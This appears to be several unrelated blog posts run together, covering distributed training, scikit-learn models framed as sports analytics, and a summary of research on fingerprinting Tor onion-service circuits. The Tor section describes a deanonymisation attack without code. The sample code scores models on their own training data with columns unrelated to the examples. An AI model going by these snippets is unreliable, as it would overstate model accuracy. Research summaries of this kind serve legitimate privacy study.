In the world of artificial intelligence and machine learning, training models often requires massive computational power-especially when dealing with very large datasets or highly complex algorithms. In such cases, a single machine may not be enough. This is where distributed training comes in.

What Is Distributed Training?

Distributed training is the practice of spreading the computational workload of training a model across multiple compute resources, such as CPUs, GPUs, or entire nodes in a cluster. Rather than relying on one machine to handle everything, multiple machines or devices collaborate in parallel to speed up and scale the process.

There are two main strategies in distributed training:

1. Data Parallel Training

In data parallel training, the dataset is split into smaller chunks, and each chunk is processed by a different compute node. Every node trains a copy of the same model on its subset of data. After each training step, the model parameters (weights and biases) are synchronized across all nodes to keep them consistent.

Practical example: Suppose you're training a facial recognition model on millions of images. In data parallel training, each GPU processes a different batch of images using the same model, and after each iteration, they all update and sync their learned weights.

2. Model Parallel Training

In model parallel training, instead of splitting the data, the model itself is divided across multiple compute nodes. This is useful when the model is too large to fit into the memory of a single machine-even if the dataset isn't huge.

Practical example: For very large language models (like GPT), you might split the architecture into layers and assign each layer to a different GPU. The model is trained in sequence, but computation is distributed across devices.

Why Distributed Training Matters

  • Speed: It accelerates training by reducing the time needed per epoch.

  • Scalability: It makes it possible to handle massive datasets and model architectures that are otherwise unmanageable.

  • Flexibility: It allows the use of diverse hardware infrastructures, including cloud platforms and on-premise clusters.

Challenges of Distributed Training

Despite its advantages, distributed training introduces some challenges:

  • Communication overhead: Synchronizing parameters across nodes can slow things down if not managed efficiently.

  • Fault tolerance: The more machines involved, the greater the chance of a failure during training.

  • Load balancing: Dividing tasks evenly among resources is not always straightforward.

Distributed training is a vital technique for building more powerful and intelligent machine learning systems. Whether you're splitting data (data parallel) or splitting models (model parallel), this approach helps overcome the computational limitations of single machines, making large-scale AI training feasible and efficient.

If you're working with deep learning or looking to scale up your AI projects, understanding distributed training is a crucial step in staying ahead.

Understanding Machine Learning Models Through the Lens of Sports Analytics

1. Logistic Regression – The Basics of Prediction

Logistic regression is often a starting point for classification problems. It's simple, efficient, and surprisingly powerful for many use cases.

Sports Example:

Predicting whether a player will score in a match based on features like shot accuracy, number of attempts, and position on the field.

from sklearn.linear_model import LogisticRegression

clf = LogisticRegression().fit(df[["num", "amount"]], df["target"])
clf.score(df[["num", "amount"]], df["target"])

With just a few lines of code, you’re ready to predict and evaluate performance. Thanks to Scikit-learn’s consistent API, this process remains the same across different models — a huge advantage for fast-paced analytics.

2. Decision Trees – Game Strategy Made Visual

Decision trees resemble the decision-making process coaches use during a match. They split data based on key features — like player stamina or match tempo — and guide you down a path of logic to make a prediction.

Sports Example:

Deciding whether to substitute a player based on current performance stats and fatigue level.

  • Easy to interpret: You can visualize the logic.

  • Flexible: Used for both classification and regression.

  • Automatic feature selection: Trees pick the most important stats to split on.

3. Random Forests – The Team Effort Approach

Random forests are like building a dream team of decision trees. Instead of relying on a single model, you train many trees on random subsets of your data and features. Each tree “votes,” and the majority wins.

Sports Example:

Predicting injury risk using a combination of training data, match stats, and player history.

from sklearn.ensemble import RandomForestClassifier

clf = RandomForestClassifier().fit(df[["num", "amount"]], df["target"])
clf.score(df[["num", "amount"]], df["target"])

Random forests provide excellent accuracy and handle noise in your dataset much better than a single tree.

4. Hierarchical Clustering – Grouping Similar Athletes

Unlike the previous models, hierarchical clustering is unsupervised. That means it finds patterns in your data without needing a target label.

Sports Example:

Grouping athletes with similar training behaviors, body metrics, or play styles to tailor training plans.

It builds clusters based on distances (e.g., Euclidean or Manhattan), forming a tree-like structure where similar data points are grouped together.

5. Feature Selection – Focus on What Matters Most

Tree-based models have another superpower: automatic feature ranking. The higher a feature appears in a decision tree, the more important it is. This helps reduce noise and improve model speed and clarity.

Sports Example:

Out of dozens of player metrics, identifying which 3–4 truly impact performance helps coaches focus their efforts.

Why Scikit-learn is a Game-Changer for Sports Analytics

Scikit-learn is the MVP of ML libraries — especially for sports analysts new to the game.

Standard API for All Models

No matter what algorithm you use, the pattern remains the same:

model.fit(X_train, y_train)
predictions = model.predict(X_test)

Switching from random forests to logistic regression? No need to rewrite your whole script.

What Happens Outside of Scikit-learn?

Other libraries like PyTorch and raw XGBoost are powerful, but they require custom training loops and data formats. This complexity can slow you down — especially when you're working with fast-changing sports data.

However, even these libraries offer Scikit-learn-compatible wrappers. With tools like XGBClassifier, you keep the simplicity while leveraging more advanced models.

Picking the Right Model for the Right Play

Here’s how these models stack up in sports:

Model Best For Example Use Case
Logistic Regression Simple binary classification Predicting win/loss
Decision Trees Interpretability, quick decision rules Tactical decisions during games
Random Forests High accuracy, robustness Injury prediction, performance classification
Hierarchical Clustering Unsupervised grouping Grouping similar players or training types

Outsmarting Digital Defenders: How Tor’s Transport Tactics and Fingerprint Attacks Shape the Anonymity Game

In the world of sport, every move is tactical. A team that wins doesn't just rely on power — it relies on strategy, disguise, and flexibility. The same holds true in the world of online anonymity.

Just like athletes dodging defenders, Tor Browser helps users avoid censorship and surveillance. But even with clever tactics like pluggable transports and dummy traffic, powerful adversaries are still trying to read the playbook. A 2022 scientific study reveals that despite Tor’s latest defenses, onion services remain vulnerable to fingerprinting attacks that can potentially deanonymize them.

This post explores how Tor fights censorship like a well-drilled sports team — and how new research shows there are still weaknesses on the field.

How Tor Uses Pluggable Transports

To access the open internet under surveillance, Tor uses multiple relays to create encrypted circuits — like passing a ball through trusted teammates. But in heavily censored countries, even the use of Tor itself can get blocked.

That’s where pluggable transports come in. These are like camouflage uniforms for Tor traffic, helping users hide in plain sight.

obfs4 – The Agile Dribbler

  • Disguise: Makes traffic look like random noise.

  • Use case: Light to moderate censorship environments.

  • Weakness: Can be detected by active probing.

  • According to a 2022 study, obfs4 can still leak metadata that allows for circuit classification — especially when not combined with other obfuscation.

Snowflake – The Swarm Tactician

  • Disguise: Routes traffic through thousands of ephemeral proxies, like peer-to-peer video calls.

  • Use case: Adaptive censorship environments (e.g. Russia).

  • Strength: Very hard to block due to rotating volunteers.

  • The ScienceDirect paper didn’t target Snowflake directly, but its architecture avoids many traditional fingerprinting points.

meek-azure – The Corporate Impersonator

  • Disguise: Makes it look like you're accessing Microsoft services.

  • Use case: High-censorship countries (e.g. China, Iran).

  • Trade-off: Very slow, resource-heavy.

  • The paper suggests that even under padding, some meek-azure circuits may be fingerprinted — especially if the traffic direction and size patterns are observable.

These transports help get around censorship — but as the new research shows, even once you're inside the Tor network, not all is safe.

Circuit Fingerprinting Attacks on Onion Services

A recent peer-reviewed study titled “Discovering Onion Services Through Circuit Fingerprinting Attacks” (published in Computer Networks, 2022) reveals a potent method for identifying onion services — even when they are protected by modern Tor defenses like WTF-PAD.

What’s the Attack?

The researchers used a machine learning-based technique called circuit fingerprinting to analyze how traffic moves across the Tor network. They didn’t need to decrypt anything — they just analyzed packet direction, timing, and size.

Their innovation: Instead of trying to identify the type of circuit (like previous methods), they focused only on who created the circuit:

  • A client

  • Or an onion service

Experimental Setup

  • Simulated Network: They used the Shadow simulator with a modified Tor codebase.

  • Data: Collected traffic from client and onion service circuits.

  • Algorithms: Tested SVM, Random Forest, and XGBoost models.

  • Defenses: Tested with and without WTF-PAD and padding machines enabled.

Precision That Breaks Anonymity

ClassifierPrecisionRecall
Random Forest99.99%99.99%
XGBoost99.99%99.99%
SVMSlightly lower
Even with application-layer traffic identical and padding active, the model could accurately identify onion service circuits. That means malicious relays could potentially identify Tor hidden services based only on circuit-level metadata.

Real-World Implications

This study changes the way we think about Tor’s anonymity guarantees:

  • Padding Isn’t Enough: Even with defensive padding, unique patterns in traffic direction and volume remain detectable.

  • Relay Adversaries Are Dangerous: Anyone running a guard or middle relay could gather data for fingerprinting.

  • Onion Services Are Traceable: Hidden services aren’t as hidden as once thought — especially if the attacker already suspects their presence.

If you're hosting a sensitive service on Tor — from journalism to whistleblowing — this threat is very real.

What's the Defense?

The authors suggest that Tor must evolve its padding techniques to hide more than just the beginning of a circuit. Some ideas include:

  • More randomized packet sizes and timing

  • Blurring directional flow during early communication

  • Circuit-level traffic normalization to mask origin patterns

For now, users should use transports like Snowflake or meek-azure when in high-risk regions and follow best practices for hidden service deployment (e.g., moving between bridges, rotating addresses, disabling JavaScript, etc.).

Privacy Is a Tactical Game

Much like a championship game, online anonymity is not won in one move. It’s a contest of evolving strategies. Tor’s pluggable transports are its offense — trying to bypass censorship — while fingerprinting attacks are the defense trying to intercept and reveal users.

The study proves that even elite tactics like WTF-PAD are not a guarantee of privacy. If you want to win the long game for anonymity, constant research, adaptation, and awareness are required — both by developers and by users.


🔗 Scientific Article: Discovering Onion Services through Circuit Fingerprinting Attacks (ScienceDirect, 2022)

🔗 Tor Project – Pluggable Transports